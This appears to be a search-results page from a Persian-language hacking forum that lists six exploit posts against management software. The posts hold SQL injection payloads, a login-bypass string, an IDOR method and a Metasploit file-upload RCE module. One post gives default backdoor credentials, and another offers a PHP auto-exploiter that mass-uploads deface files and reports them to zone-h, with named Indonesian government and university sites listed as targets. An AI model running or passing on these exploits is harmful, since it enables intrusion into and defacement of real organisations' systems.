iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'management'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

13 نتیجه پیدا شد

  1. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  2. #Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Remote File Upload Exploit #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High #CXSecurity : cxsecurity.com/ascii/WLB-2018050260 #Cyberizm : cyberizm.org/cyberizm-slims-senayan-library-management-system-indo-exploit.html ############################################################################################################## # Long Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. ############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] Important Note : Only .txt .jpg .gif .png files are allowed. # Uploaded File Directory Path : TARGET/PATH/repository/.... TARGET/repository/.... ############################################################################################################## # Example Sites : # perpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S # pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP # pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6 pn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php pa-kualatungkal.go.id/pustaka/admin/modules/bibliography/pop_attach.php pta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php pn-bangil.go.id/perpustakaan/data/admin/modules/bibliography/pop_attach.php pn-tabanan.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php perpustakaan.pn-balige.go.id/admin/modules/bibliography/pop_attach.php docrepository.undana.ac.id/admin/modules/bibliography/pop_attach.php digilib.stimata.ac.id/admin/modules/bibliography/pop_attach.php pustaka.pusair-pu.go.id/akasia/admin/modules/bibliography/pop_attach.php perpustakaan.pn-donggala.go.id/admin/modules/bibliography/pop_attach.php perpustakaan.stikes-paguwarmas.ac.id/admin/modules/bibliography/pop_attach.php opac.staiattanwir.ac.id/repository/admin/modules/bibliography/pop_attach.php opac.lib.idu.ac.id/library_unhan/admin/modules/bibliography/pop_attach.php www.perpustakaanbalitsereal.com/admin/modules/bibliography/pop_attach.php epository.hafshawaty.ac.id/admin/modules/bibliography/pop_attach.php perpusffup.univpancasila.ac.id/admin/modules/bibliography/pop_attach.php perpus.stikesmedikacikarang.ac.id/slim/admin/modules/bibliography/pop_attach.php rbaca.bukitasamfoundation.com/perpustakaan/admin/modules/bibliography/pop_attach.php e-library.darunnajah.ac.id/admin/modules/bibliography/pop_attach.php ############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################
  3. *Exploit Title:* IDOR on ProConf Peer-Review and Conference Management System *Date:* 19/07/2018 *Exploit Author:* S. M. Zia Ur Rashid *Author Contact:* https://www.linkedin.com/in/ziaurrashid/ *Vendor Homepage:* http://proconf.org & http://myproconf.org *Affected Version:* <= 6.0 *Patched Version:* 6.1 *CVE ID:* CVE-2018-16606 *Description:* In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows any author to view and grab all submitted papers (Title and Abstract) and their authors' personal information (Name, Email, Organization, and Position) by changing the value of Paper ID (the pid parameter). PROOF-OF-CONCEPT Step 1: Sign In as an author for a conference & submit a paper. Youall get a paper ID. Step 2: Now go to paper details and change the value of Paper ID (param pid=xxxx) to nearest previous value to view others submitted paper & authors information. http:// <http:> [host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
  4. ############################################ # Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass # Author: Rednofozi # category : webapps # Tested On : Pardus / Debian Web Server # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Software Link: http://demosite.center/hycus/ # Vendor Homepage: http://www.hycus.com/ ############################################ ####################Proof of Concept ############# #Proof Of Concept use login bypass payload for username= '=' 'OR' for password= '=' 'OR' ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1991
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  6. ====================================================================================================================================== | # Title : The Next Gen School Management Software - Menorah Academy 7.0 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : https://codecanyon.net/item/the-next-gen-school-management-software-menorah-academy/19606916 | | # Dork : "Menorah Academy System" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Use Admin : Owner Login: owner@owner.com/password Admin Login: admin@admin.com/password http://www.schoolsewa.com/mastersettings/settings/view/site-settings <=====| Edit Site Logo Upload here php evil file Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================
